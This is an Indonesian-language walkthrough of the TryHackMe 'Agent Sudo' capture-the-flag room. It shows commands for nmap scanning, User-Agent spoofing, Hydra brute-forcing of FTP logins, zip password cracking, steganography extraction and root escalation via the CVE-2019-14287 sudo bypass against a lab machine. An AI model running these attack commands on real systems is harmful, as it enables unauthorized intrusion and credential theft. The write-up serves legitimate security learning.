AGEN SUDO PADA TRYHACKME

Jan 14 2023
Ruang yang menantang di jalur pemula di Agen sudo di Tryhackme Lab cukup lambat, jadi kita harus menunggu pemindaian port. Jadi mari kita mulai ada banyak hal yang harus dipelajari.

Ruang yang menantang di jalur pemula di Agen sudo di Tryhackme

Labnya cukup lambat, jadi kami harus menunggu pemindaian port.

Jadi mari kita mulai ada banyak hal yang harus dipelajari.

A) Pertama kita akan melakukan NMAP

nmap -sV -sC -A 10.10.111.153

      
                

jadi kami melihat di port 80 halaman web apa yang berjalan di Http

Dikatakan ubah User-agent untuk melewati halaman ini jadi apa yang bisa kita lakukan?

Kami menggunakan alat proxy 'Burpsuite' apa itu? alat yang digunakan untuk pengujian Penetrasi.

Gunakan burp untuk mencegat permintaan Sekarang ubah agen pengguna ke C

Dengan User-agent disetel ke C, kita dialihkan ke http://10.10.111.153/agent_C_attention.php, di mana kita dapat melihat pesan berikut:

Saya berasumsi bahwa "chris" harus menjadi pengguna sistem.

jadi apa yang bisa kita lakukan disini?

Sekarang kita tahu nama pengguna adalah chris sehingga kita dapat menggunakan 'Hydra' untuk memaksa mendapatkan kredensial FTP pengguna.

ketik

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.111.153

      
                

masuk menggunakan Kredensial FTP

ftp 10.10.111.153

      
                

Kita dapat menggunakan alat Exiftool atau steghide untuk mendapatkan metadata dari gambar tersebut.

Sekarang bin walk file dan di cutie.png kami menemukan sesuatu

binwalk -e cutie.png

      
                
which extracted all the hidden files in it.

Sekarang kita perlu memecahkan kata sandi untuk file 8702.zip

zip2john 8702.zip > out.txt
jonh --wordlist=/usr/share/wordlists/rockyou.txt out.txt

      
                

Sekarang ekstrak isinya

7z e 8702.zip

      
                

cat To_agentR.txt

      
                

echo "QXJlYTUx" | base64 -d

Sekarang mari ekstrak teks atau file dari cute-alien.jpg

steghide extract -sf cute-alien.jpg
# Enter Area51 as passphrase
cat message.txt

      
                

Langkah selanjutnya kita coba login menggunakan kredensial SSH

ssh [email protected]

Kami mendapat bendera pengguna!

kami mencoba mendapatkan Alien autospy.jpg menggunakan ketik

sudo scp [email protected]:Alien_autospy.jpg

Otopsi Alien Rosswell

Untuk mendapatkan flag root, kita perlu memeriksa izin atau hak istimewa apa yang kita miliki

Yang ini sedikit lebih rumit. Pertama ketik perintah.

sudo -l

      
                

CVE-2019–14287

Tingkatkan hak istimewa

sudo -u#-1 /bin/bash

      
                

Sekarang kami memiliki semua Jawaban kami, mari kirimkan dan kami telah berhasil menyelesaikan KKP kami !!

Terus Berusaha, Terus Berkarya :)

Terima kasih telah membaca!!

Selamat Meretas GUYS

Author: Xploit Ayush